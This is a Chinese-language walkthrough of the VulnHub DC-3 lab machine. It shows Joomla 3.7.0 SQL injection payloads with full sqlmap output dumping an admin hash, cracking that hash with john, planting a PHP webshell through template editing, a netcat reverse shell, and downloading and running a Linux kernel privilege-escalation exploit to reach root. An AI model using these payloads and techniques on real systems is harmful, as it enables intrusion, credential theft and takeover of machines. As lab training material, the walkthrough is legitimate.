实验环境
- 攻击机kali: ip 172.25.0.69
- DC3靶机: MAC地址 00:0c:29:e5:84:bf
DC3靶机下载地址:https://www.vulnhub.com/entry/dc-3,312/
0x01 主机发现
netdiscover -i eth0 -r 172.25.0.0/24 //存活主机探测
通过mac地址匹配发现DC3靶机IP地址为 172.25.0.65
image.png
0x02 端口扫描
使用nmap对Dc3靶机进行端口扫描
nmap -sV -O 172.25.0.0/24
-sV 参数:版本探测
-O 参数:操作系统版本探测
image.png
访问DC3靶机发布的网页,查看源码,发现该网站是基于joomla cms搭建
image.png
kali下载joomscan扫描器
apt-get update
apt-get install joomscan
使用joomscan对Dc3靶机网站进行扫描
joomscan --url http://172.25.0.65
Processing http://172.25.0.65 ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.7.0
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking Directory Listing
[++] directory has directory listing :
http://172.25.0.65/administrator/components
http://172.25.0.65/administrator/modules
http://172.25.0.65/administrator/templates
http://172.25.0.65/images/banners
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://172.25.0.65/administrator/
[+] Checking robots.txt existing
[++] robots.txt is not found
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config files are not found
Your Report : reports/172.25.0.65/
0x03 漏洞利用
扫描得到网站cms版本为joomla 3.7.0
查找该cms版本存在的漏洞
kali@kali:~$ searchsploit joomla 3.7.0
-------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------- ----------------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Inje | exploits/php/webapps/42033.txt
-------------------------------------- ----------------------------------------
Shellcodes: No Result
下载漏洞描述文件到当前文件夹,并查看该文本。
kali@kali:~$ searchsploit -m 42033
Exploit: Joomla! 3.7.0 - 'com_fields' SQL Injection
URL: https://www.exploit-db.com/exploits/42033
Path: /usr/share/exploitdb/exploits/php/webapps/42033.txt
File Type: ASCII text, with CRLF line terminators
Copied to: /home/kali/42033.txt
kali@kali:~$ cat 42033.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)kalikali@kali:~$ cat 42033.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)
下面我们来按照该漏洞的利用方法来进行渗透测试
C:\Users\Administrator\Desktop\burp\sqlmap-master>python sqlmap.py -u "http://172.25.0.65/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --current-db --thread 1000
___
__H__
___ ___[)]_____ ___ ___ {1.4.2.30#dev}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:58:37 /2019-01-29/
[18:58:37] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050918 Firefox/1.0.6' from file 'C:\Users\Administrator\Desktop\burp\sqlmap-master\data\txt\user-agents.txt'
[18:58:37] [INFO] resuming back-end DBMS 'mysql'
[18:58:37] [INFO] testing connection to the target URL
[18:58:37] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=b31ivobr7do...e47g41u686'). Do you want to use those [Y/n]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(4846,CONCAT(0x2e,0x7171787071,(SELECT (ELT(4846=4846,1))),0x7162707a71),3937))
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 7928 FROM (SELECT(SLEEP(5)))gRwM)
---
[18:58:38] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[18:58:38] [INFO] fetching current database
[18:58:38] [INFO] resumed: 'joomladb'
current database: 'joomladb'
[18:58:38] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[18:58:38] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.65'
[*] ending @ 18:58:38 /2019-01-29/
C:\Users\Administrator\Desktop\burp\sqlmap-master>python sqlmap.py -u "http://172.25.0.65/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb --tables --thread 1000
___
__H__
___ ___[,]_____ ___ ___ {1.4.2.30#dev}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:01:53 /2020-02-24/
[19:01:53] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6' from file 'C:\Users\Administrator\Desktop\burp\sqlmap-master\data\txt\user-agents.txt'
[19:01:53] [INFO] resuming back-end DBMS 'mysql'
[19:01:53] [INFO] testing connection to the target URL
[19:01:53] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=kl37jjvfrku...bga3e7pp63'). Do you want to use those [Y/n]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(4846,CONCAT(0x2e,0x7171787071,(SELECT (ELT(4846=4846,1))),0x7162707a71),3937))
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 7928 FROM (SELECT(SLEEP(5)))gRwM)
---
[19:01:54] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[19:01:54] [INFO] fetching tables for database: 'joomladb'
[19:01:54] [INFO] starting 91 threads
Database: joomladb
[76 tables]
+---------------------+
| #__assets |
| #__associations |
| #__banner_clients |
| #__banner_tracks |
| #__banners |
| #__bsms_admin |
| #__bsms_books |
| #__bsms_comments |
| #__bsms_locations |
| #__bsms_mediafiles |
| #__bsms_message_typ |
| #__bsms_podcast |
| #__bsms_series |
| #__bsms_servers |
| #__bsms_studies |
| #__bsms_studytopics |
| #__bsms_teachers |
| #__bsms_templatecod |
| #__bsms_templates |
| #__bsms_timeset |
| #__bsms_topics |
| #__bsms_update |
| #__categories |
| #__contact_details |
| #__content_frontpag |
| #__content_rating |
| #__content_types |
| #__content |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions |
| #__fields_categorie |
| #__fields_groups |
| #__fields_values |
| #__fields |
| #__finder_filters |
| #__finder_links_ter |
| #__finder_links |
| #__finder_taxonomy_ |
| #__finder_taxonomy |
| #__finder_terms_com |
| #__finder_terms |
| #__finder_tokens_ag |
| #__finder_tokens |
| #__finder_types |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages |
| #__menu_types |
| #__menu |
| #__messages_cfg |
| #__messages |
| #__modules_menu |
| #__modules |
| #__newsfeeds |
| #__overrider |
| #__postinstall_mess |
| #__redirect_links |
| #__schemas |
| #__session |
| #__tags |
| #__template_styles |
| #__ucm_base |
| #__ucm_content |
| #__ucm_history |
| #__update_sites_ext |
| #__update_sites |
| #__updates |
| #__user_keys |
| #__user_notes |
| #__user_profiles |
| #__user_usergroup_m |
| #__usergroups |
| #__users |
| #__utf8_conversion |
| #__viewlevels |
+---------------------+
[19:01:54] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[19:01:54] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.65'
[*] ending @ 19:01:54 /2020-02-24/
C:\Users\Administrator\Desktop\burp\sqlmap-master>python sqlmap.py -u "http://172.25.0.65/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D "joomladb" -T "#__users" --columns --thread 1000
___
__H__
___ ___[']_____ ___ ___ {1.4.2.30#dev}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:05:24 /2020-02-24/
[19:05:25] [INFO] fetched random HTTP User-Agent header value 'Opera/9.60 (Windows NT 6.0; U; de) Presto/2.1.1' from file 'C:\Users\Administrator\Desktop\burp\sqlmap-master\data\txt\user-agents.txt'
[19:05:29] [INFO] resuming back-end DBMS 'mysql'
[19:05:29] [INFO] testing connection to the target URL
[19:05:30] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=m1ucf8qoadi...7crs3ls662'). Do you want to use those [Y/n]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(4846,CONCAT(0x2e,0x7171787071,(SELECT (ELT(4846=4846,1))),0x7162707a71),3937))
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 7928 FROM (SELECT(SLEEP(5)))gRwM)
---
[19:05:32] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[19:05:32] [INFO] fetching columns for table '#__users' in database 'joomladb'
[19:05:32] [WARNING] unable to retrieve column names for table '#__users' in database 'joomladb'
do you want to use common column existence check? [y/N/q] y
[19:05:36] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
which common columns (wordlist) file do you want to use?
[1] default 'C:\Users\Administrator\Desktop\burp\sqlmap-master\data\txt\common-columns.txt' (press Enter)
[2] custom
> 1
[19:05:39] [INFO] checking column existence using items from 'C:\Users\Administrator\Desktop\burp\sqlmap-master\data\txt\common-columns.txt'
[19:05:39] [INFO] adding words used on web page to the check list
[19:05:39] [INFO] starting 1000 threads
[19:05:39] [INFO] retrieved: id
[19:05:39] [INFO] retrieved: name
[19:05:39] [INFO] retrieved: username
[19:05:40] [INFO] retrieved: email
[19:05:44] [INFO] retrieved: password
[19:06:30] [INFO] retrieved: params
Database: joomladb
Table: #__users
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| email | non-numeric |
| id | numeric |
| name | non-numeric |
| params | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+
[19:07:03] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2636 times
[19:07:03] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.65'
[*] ending @ 19:07:03 /2020-02-24/
C:\Users\Administrator\Desktop\burp\sqlmap-master>python sqlmap.py -u "http://172.25.0.65/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D "joomladb" -T "#__users" -C "username,password" --dump --thread 1000
___
__H__
___ ___[']_____ ___ ___ {1.4.2.30#dev}
|_ -| . [(] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:08:04 /2020-02-24/
[19:08:04] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.0 Safari/530.5' from file 'C:\Users\Administrator\Desktop\burp\sqlmap-master\data\txt\user-agents.txt'
[19:08:07] [INFO] resuming back-end DBMS 'mysql'
[19:08:07] [INFO] testing connection to the target URL
[19:08:07] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=j9c87l7jno8...9ddcnibps2'). Do you want to use those [Y/n]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(4846,CONCAT(0x2e,0x7171787071,(SELECT (ELT(4846=4846,1))),0x7162707a71),3937))
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 7928 FROM (SELECT(SLEEP(5)))gRwM)
---
[19:08:19] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[19:08:19] [INFO] fetching entries of column(s) 'password, username' for table '#__users' in database 'joomladb'
[19:08:19] [INFO] resumed: '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJw...
[19:08:19] [INFO] resumed: 'admin'
Database: joomladb
Table: #__users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+
[19:08:19] [INFO] table 'joomladb.`#__users`' dumped to CSV file 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.65\dump\joomladb\#__users.csv'
[19:08:19] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[19:08:19] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.65'
[*] ending @ 19:08:19 /2020-02-24/
通过SQLI漏洞拿下网站后台管理员账密
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+
使用john工具破解admin用户的加密密文,破解得到admin密码为snoopy。
vim admin
admin:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
kali@kali:~$ john admin
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates buffered for the current salt, minimum 12 needed for performance.
Warning: Only 8 candidates buffered for the current salt, minimum 12 needed for performance.
Warning: Only 9 candidates buffered for the current salt, minimum 12 needed for performance.
Warning: Only 11 candidates buffered for the current salt, minimum 12 needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 12 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 11 candidates buffered for the current salt, minimum 12 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
snoopy (admin)
1g 0:00:00:10 DONE 2/3 (2020-02-24 06:13) 0.09451g/s 83.64p/s 83.64c/s 83.64C/s 123456..buster
Use the "--show" option to display all of the cracked passwords reliably
Session completed
由上面的jommscan扫描得到后台地址我们登录后台进行管理
Joomla后台可编辑模板,修改源码,我们利用这个功能,在template下面html创建一个 config.php,写入一句话,蚁剑成功连接
joomla目录结构参考链接:https://www.anquanke.com/post/id/86178
上传文件url路径:http://172.25.0.65/templates/beez3/html/config.php
image.png
image.png
php反弹shell
php conflg.php //webshell
nc -lvvp //kali
python3 -c 'import pty;pty.spawn("/bin/bash")' //进入交互式shell
image.png
kali@kali:~$ nc -lvvp 1234
listening on [any] 1234 ...
172.25.0.65: inverse host lookup failed: Unknown host
connect to [172.25.0.69] from (UNKNOWN) [172.25.0.65] 41028
python -c 'import pty;pty.spawn("/bin/bash")'
/bin/sh: 1: python: not found
python -v
/bin/sh: 2: python: not found
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@DC3VM:/var/www/html/templates/beez3/html$
0x04 Linux内核提权
uname -a 查看内核信息,并百度查到DC3操作系统为ubuntu 16.04版本
searchsploit ubuntu 16.04
kali@kali:~$ searchsploit ubuntu 16.04
---------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
---------------------------------------------------------------------------- ----------------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution | exploits/linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation | exploits/linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video | exploits/linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation | exploits/linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22 | exploits/linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) | exploits/linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps | exploits/linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbit | exploits/linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metaspl | exploits/linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Point | exploits/linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-B | exploits/linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' | exploits/linux/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Pri | exploits/linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege | exploits/linux/local/40489.txt
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer | exploits/linux/dos/45919.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalati | exploits/linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | exploits/linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Loca | exploits/linux/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege | exploits/linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zori | exploits/linux/local/47169.c
---------------------------------------------------------------------------- ---------------------------------------
kali@kali:~$ searchsploit -m 39772
Exploit: Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation
URL: https://www.exploit-db.com/exploits/39772
Path: /usr/share/exploitdb/exploits/linux/local/39772.txt
File Type: C source, ASCII text, with CRLF line terminators
Copied to: /home/kali/39772.txt
kali@kali:~$ cat 39772.txt
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.
When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
This is done as follows:
/* look for pseudo eBPF instructions that access map FDs and
* replace them with actual map pointers
*/
static int replace_map_fd_with_map_ptr(struct verifier_env *env)
{
struct bpf_insn *insn = env->prog->insnsi;
int insn_cnt = env->prog->len;
int i, j;
for (i = 0; i < insn_cnt; i++, insn++) {
[checks for bad instructions]
if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
struct bpf_map *map;
struct fd f;
[checks for bad instructions]
f = fdget(insn->imm);
map = __bpf_map_get(f);
if (IS_ERR(map)) {
verbose("fd %d is not pointing to valid bpf_map\n",
insn->imm);
fdput(f);
return PTR_ERR(map);
}
[...]
}
}
[...]
}
__bpf_map_get contains the following code:
/* if error is returned, fd is released.
* On success caller should complete fd access with matching fdput()
*/
struct bpf_map *__bpf_map_get(struct fd f)
{
if (!f.file)
return ERR_PTR(-EBADF);
if (f.file->f_op != &bpf_map_fops) {
fdput(f);
return ERR_PTR(-EINVAL);
}
return f.file->private_data;
}
The problem is that when the caller supplies a file descriptor number referring
to a struct file that is not an eBPF map, both __bpf_map_get() and
replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If
__fget_light() detected that the file descriptor table is shared with another
task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause
the reference count of the struct file to be over-decremented, allowing an
attacker to create a use-after-free situation where a struct file is freed
although there are still references to it.
A simple proof of concept that causes oopses/crashes on a kernel compiled with
memory debugging options is attached as crasher.tar.
One way to exploit this issue is to create a writable file descriptor, start a
write operation on it, wait for the kernel to verify the file's writability,
then free the writable file and open a readonly file that is allocated in the
same place before the kernel writes into the freed file, allowing an attacker
to write data to a readonly file. By e.g. writing to /etc/crontab, root
privileges can then be obtained.
There are two problems with this approach:
The attacker should ideally be able to determine whether a newly allocated
struct file is located at the same address as the previously freed one. Linux
provides a syscall that performs exactly this comparison for the caller:
kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).
In order to make exploitation more reliable, the attacker should be able to
pause code execution in the kernel between the writability check of the target
file and the actual write operation. This can be done by abusing the writev()
syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays
read accesses, then mmap()s a file containing a struct iovec from that FUSE
filesystem and passes the result of mmap() to writev(). (Another way to do this
would be to use the userfaultfd() syscall.)
writev() calls do_writev(), which looks up the struct file * corresponding to
the file descriptor number and then calls vfs_writev(). vfs_writev() verifies
that the target file is writable, then calls do_readv_writev(), which first
copies the struct iovec from userspace using import_iovec(), then performs the
rest of the write operation. Because import_iovec() performs a userspace memory
access, it may have to wait for pages to be faulted in - and in this case, it
has to wait for the attacker-owned FUSE filesystem to resolve the pagefault,
allowing the attacker to suspend code execution in the kernel at that point
arbitrarily.
An exploit that puts all this together is in exploit.tar. Usage:
user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)
This exploit was tested on a Ubuntu 16.04 Desktop system.
Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7
Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
根据漏洞文本信息下载内核漏洞提权exp
exp下载页面:https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
通过中国蚁剑上传该exp,提权成功并在/root拿到flag
unzip 39772.zip
cd 39772/ebpf_mapfd_doubleput_exploit
chmod +x compile.sh doubleput
./compile.sh
./doubleput
<tes/beez3/html/39772/ebpf_mapfd_doubleput_exploit# cd /root
cd /root
root@DC3VM:/root# ls
ls
the-flag.txt
root@DC3VM:/root# cat the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
Congratulations are in order for completing DC-3VM. :-)
I hope you've enjoyed this challenge as much as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!
